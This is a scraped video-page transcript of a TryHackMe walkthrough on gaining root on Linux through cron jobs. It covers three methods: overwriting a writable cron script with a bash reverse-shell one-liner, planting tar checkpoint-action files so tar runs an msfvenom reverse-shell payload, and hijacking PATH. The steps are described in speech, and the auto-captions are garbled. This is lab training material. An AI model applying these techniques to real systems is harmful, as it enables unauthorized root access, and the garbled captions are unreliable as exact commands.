Linux Privilege Escalation Techniques | Cron Jobs | TryHackMe

Video Statistics and Information

Video
Captions Word Cloud
Reddit Comments
Captions
welcome back today we're going to continue with linux privilege escalation room in this room we will be going over task 8 9 10 where we will be explaining the privilege escalation using cron jobs so let's jump into it so first you deploy the machine and you log in using the ssh credentials so after that let's go over the chrome tabs and see what are the chrome jobs that are running so basically to view the chrome jobs we can issue the following command cat etc crontab so based on the output here we have two entries one for a script overwrite and also another one for compressed.sh so basically we have two clone jobs running for these two scripts so how can we uh escalate the privileges using or based on the output here so basically let's go over the first one first locate where it is located on the system so using locate over right sh so locate is in user local bin override so one way to escalate the privileges is to check the permissions of the script so once we check the permissions we can decide if we can overwrite the script with a contents crafted from our side so ls la and just do that grab over right sh so based on the output as you can see here the script is writable and readable by the staff group and the user we are signed in with is actually part of the staff group so it means we can override the script with our content let's view the content of the script cat overwrite sh oh okay i think i have to go to the directory specify the directory all right echo dates temp to useless so basically it just echoes the date so we can do we can change the content of that using an echo command or we can use nano basically nano over so here we remove this command and we can replace that if config just find the ip this is by my ip address and we can replace that with basic bash reverser let me check out all right so let's search for reversions okay let's see this one is good batch reversal one liner paste that here specify the port in my case 4545 specify the ip which is here and that's it now let's open the listener on my side and now we should wait for the script to execute on its own and receive the first cell so we got the reversal back we're connecting to our machine and the it is root actually the reason for that is the script is run as root as you can see so that is the first method modifying a script that is running as part of a current job now the next method the next method is to examine the compressed sh script so let's clear here and again display the content of the chrome tab cat compressed.sh so it is doing some kind of yeah it is a zip command or dark command and it is using a wildcard so one way to exploit the targement or advantage when it is using white card is by manipulating an environment variable so basically uh no not environmental sorry we have to manipulate the wild cards so we can create um some sort of payload on our own and then we let tar execute that payload so here let's exit out of the shell clear and create a payload sudo msf venom sp linux x64 shell reverse tcp lhost replace that with your ip l port 4545 dash f elf dash o cell with elf meanwhile let's go to gta pins look for dart fire fire retail sudo let's see okay i don't think we will need to use um let's guitar up up up shell okay i think this is the way we should follow here we have to create some sort of checkpoints and then let tar execute the shell we have created all right so we have created our shell let's download the shell to the user machine python 3-m http server the server started wget so now we are transferring the shell to the target machine cell dlf so we've got the shell here now all right so here we have got the shell and let's examine the permissions of the compress by typing ls-la so the script is only readable by the group staff right so we can't just overwrite it so we have to rely on the fact that tar is using the wild card okay so based on the utf opinions here we have examined i will create a checkpoint in the home directory transfer the shell to that home directory and let dar execute the shell i have created in the checkpoint so let's see the or let's uh yeah cd home all right so let's now move [Music] see the user oh see the home okay let me move that one cp shell elf into home user or let's move okay see the home user we've got the shell here now let's create two checkpoints touch home the checkpoint will be located here that's this check point equal one the second one touch um user again will be at the same directory checkpoint dash the action will be to execute the cell okay nc lvp four five four five and now we receive the second reversal as the root user so what happened actually we created a shell all right transferred yeah payload transfer the payload to the home user of the target machine now we know that the compressor.sh contains a tar command that is using wild cards so if i display the content of that again one more time as you can see it's using wildcard so basically wildcard will expand to include the files created at the home directory in the checkpoint since their file names are valid dark command line options star will recognize them as such while by the way this is called the white card exploitation technique and it doesn't work in all versions so make sure your tar if you have tower make sure it is up to date and make sure to use the wildcard correctly all right so now that's the second way all right if you encounter tower command in one of the scripts running as chrome job and if guitar command is using a wildcard that's how you exploit it now the last step or the last technique is using the environment variables so environment variables of i again get etc chron tab so again i have the two scripts but here we have the path to the environment variable and it starts with the home user all right it starts with the home user so if we write a script in the home user directory and let one of these scripts execute our payload it will give us reverse shell we can execute our own payload so basically the overwrite or the system when executing overwrite since the path is not specified here because the path is not specified the system will use the path environment variable or the values in the path environment variable to locate the script and once it finds a match it will execute the first match that's why if we create one in the home user it will execute it first so let's see to use f and let's create a script called nano overwrite sh in here we can just type our own script then dash um okay let's mix exit first let's go to temp uh so what i'm gonna do here i'm gonna create my script here at the temp directory and let the overwrite execute the script in the temp directory bin bash and then let's copy that one liner four five four five remember to change the ip address so remember to give that script execute permissions shell sh okay next step now is to modify or to create the override script at the home user home user nano over right sh oh yeah that one okay i'm not gonna listen on that so basically here we can what you can do you can create one bin dash so here one line only execute the script at this at the temp directory message let's wait for the shell and we receive it quickly id root so there is one question to answer what is the value of the path variable in etc chrome tab so back to etc tab cat utc clone this is the value all right then so that was about the chrome tech the grown privilege escalation technique through chrome jobs so thank you for watching
Info
Channel: Motasem Hamdan
Views: 9,393
Rating: undefined out of 5
Keywords: Linux
Id: ewWBJCd6hRY
Channel Id: undefined
Length: 17min 21sec (1041 seconds)
Published: Thu Aug 19 2021
Related Videos
Note
Please note that this website is currently a work in progress! Lots of interesting data and statistics to come.